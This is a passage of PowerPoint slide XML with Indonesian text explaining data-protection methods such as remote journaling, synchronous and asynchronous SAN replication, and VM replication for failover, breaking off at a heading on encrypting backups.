              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setelah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> crash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terduga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penjurnalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Penjurnalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jurnal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jahat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menduplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hampir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Teknik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinkron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asinkron</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>replikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memelihara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>salinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual pada host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekunder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada VM primer. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Cadangan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
